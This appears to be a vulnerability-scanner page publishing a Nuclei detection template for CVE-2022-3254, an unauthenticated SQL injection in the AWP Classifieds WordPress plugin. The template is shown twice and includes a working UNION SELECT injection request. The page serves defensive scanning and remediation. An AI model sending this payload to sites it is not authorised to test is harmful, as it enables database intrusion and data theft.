AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection

CVE-2022-3254

Verified

Description

WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands, exploit requires the premium module to be active.

Severity

Critical

Published Date

February 6, 2026

Template Author

shivam kamboj

CVE-2022-3254.yaml

id: CVE-2022-3254

info:
  name: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands, exploit requires the premium module to be active.
  remediation: |
    Update to version 4.3 or later.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3254
    - https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/another-wordpress-classifieds-plugin/"
  tags: cve,cve2022,sqli,wordpress,wp-plugin,awpcp,unauth,wp,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id`+FROM+wp_users+WHERE+1=0+UNION+SELECT+VERSION();--+- HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'startswith(trim(body), "{")' # Ensure response is JSON structure
          - 'contains_all(body, "options", "status")'
          - '!contains(body, "\"options\":false")'
          - '!regex(body, "\"options\"\\s*:\\s*\\[\\s*\\]")'
        condition: and
# digest: 4a0a00473045022039b01f894e5ae7efd5f6585ba5fc791b47f973783458b2bacc15ff811049b57a022100d7522a9a5044adc9476aba52b88680f8f5e19ef31da77826020390ca250bc773:922c64590222798bb761d5b6d8e72950

9.5Severity

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2022-3254 https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660

Remediation Steps

Update to version 4.3 or later.

id: CVE-2022-3254

info:
  name: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands, exploit requires the premium module to be active.
  remediation: |
    Update to version 4.3 or later.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3254
    - https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/another-wordpress-classifieds-plugin/"
  tags: cve,cve2022,sqli,wordpress,wp-plugin,awpcp,unauth,wp,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id`+FROM+wp_users+WHERE+1=0+UNION+SELECT+VERSION();--+- HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'startswith(trim(body), "{")' # Ensure response is JSON structure
          - 'contains_all(body, "options", "status")'
          - '!contains(body, "\"options\":false")'
          - '!regex(body, "\"options\"\\s*:\\s*\\[\\s*\\]")'
        condition: and
# digest: 4a0a00473045022039b01f894e5ae7efd5f6585ba5fc791b47f973783458b2bacc15ff811049b57a022100d7522a9a5044adc9476aba52b88680f8f5e19ef31da77826020390ca250bc773:922c64590222798bb761d5b6d8e72950

AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps